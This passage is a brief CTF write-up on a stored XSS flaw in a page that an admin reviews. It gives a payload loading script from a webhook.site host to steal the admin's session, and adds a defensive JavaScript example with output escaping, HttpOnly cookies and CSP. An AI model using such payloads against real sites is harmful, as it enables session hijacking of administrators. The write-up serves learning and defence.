After logging in, there is a page where you can write something for the admin to review.
This page is vulnerable to XSS.
An admin checks every request, so a script submitted through this page runs in the admin's browser. We can get his session by using XSS.
A nice writeup:
https://systemweakness.com/solving-the-xss-htb-ctf-challenge-5c4d5fb9e1b2
<script src="https://webhook.site/[your website]"></script>
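The server-side fix for the flaw described above, as an added example that is not part of the original writeup: the review page rendered with and without output encoding, plus the cookie and CSP headers that keep the admin's session out of reach of an injected script. The function names, the collector.example host and the sample submission are constructed for illustration.

```javascript
// Added example: admin review page rendering, vulnerable vs hardened.
// All names (renderReview*, reviewResponseHeaders, collector.example) are hypothetical.

// Constructed sample submission, shaped like the payload in the writeup.
const SAMPLE = '<script src="https://collector.example/x"></script>';

// Vulnerable: user text is concatenated into HTML, so the browser of whoever
// opens the review page (the admin) parses the <script> tag and runs it.
function renderReviewVulnerable(message) {
  return `<div class="review">${message}</div>`;
}

// Escape the five characters that can change HTML context.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: the submission is rendered as text, never as markup.
function renderReviewHardened(message) {
  return `<div class="review">${escapeHtml(message)}</div>`;
}

// Defence in depth for the review page response.
function reviewResponseHeaders(sessionId) {
  return {
    // HttpOnly keeps the session cookie out of document.cookie, so a script
    // that does run cannot read it; Secure and SameSite limit where it is sent.
    'Set-Cookie': `session=${sessionId}; HttpOnly; Secure; SameSite=Strict; Path=/`,
    // Only same-origin scripts may load; an external <script src> is blocked.
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'",
  };
}

// Check helper: does rendered HTML contain a live script element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('vulnerable page has script tag:', containsScriptTag(renderReviewVulnerable(SAMPLE)));
console.log('hardened page has script tag:  ', containsScriptTag(renderReviewHardened(SAMPLE)));
console.log(renderReviewHardened(SAMPLE));
console.log(reviewResponseHeaders('constructed-session-id'));
```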
After sending some requests, one of them had the flag: